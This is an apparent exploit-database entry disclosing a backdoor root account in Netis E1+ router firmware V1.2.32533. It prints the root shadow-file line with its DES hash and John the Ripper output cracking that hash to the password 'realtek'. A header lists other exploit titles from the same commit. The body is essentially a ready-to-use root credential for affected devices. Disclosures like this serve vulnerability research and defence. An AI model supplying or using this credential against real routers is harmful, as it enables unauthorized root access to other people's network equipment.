b1e1bfd776
7 changes to exploits/shellcodes Source Engine CS:GO BuildID: 4937372 - Arbitrary Code Execution PHP-Fusion 9.03.50 - 'Edit Profile' Arbitrary File Upload Netis E1+ 1.2.32533 - Backdoor Account (root) Online shopping system advanced 1.0 - 'p' SQL Injection Netis E1+ V1.2.32533 - Unauthenticated WiFi Password Leak Online Course Registration 2.0 - Authentication Bypass Maian Support Helpdesk 4.3 - Cross-Site Request Forgery (Add Admin)
21 lines
No EOL
857 B
Text
21 lines
No EOL
857 B
Text
# Exploit Title: Netis E1+ 1.2.32533 - Backdoor Account (root)
|
|
# Date: 2020-04-25
|
|
# Author: Besim ALTINOK
|
|
# Vendor Homepage: http://www.netis-systems.com
|
|
# Software Link: http://www.netis-systems.com/Suppory/downloads/dd/1/img/204
|
|
# Version: V1.2.32533
|
|
# Tested on: Netis E1+ V1.2.32533
|
|
# Credit: İsmail BOZKURT
|
|
-----------------------------
|
|
|
|
*root:abSQTPcIskFGc:0:0:root:/:/bin/sh*
|
|
|
|
|
|
Created directory: /home/pentestertraining/.john
|
|
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 SSE2-16])
|
|
Press 'q' or Ctrl-C to abort, almost any other key for status
|
|
Warning: MaxLen = 13 is too large for the current hash type, reduced
|
|
to 8*realtek (root)*
|
|
1g 0:00:00:28 3/3 0.03533g/s 1584Kp/s 1584Kc/s 1584KC/s realka2..reasll5
|
|
Use the "--show" option to display all of the cracked passwords reliably
|
|
Session completed |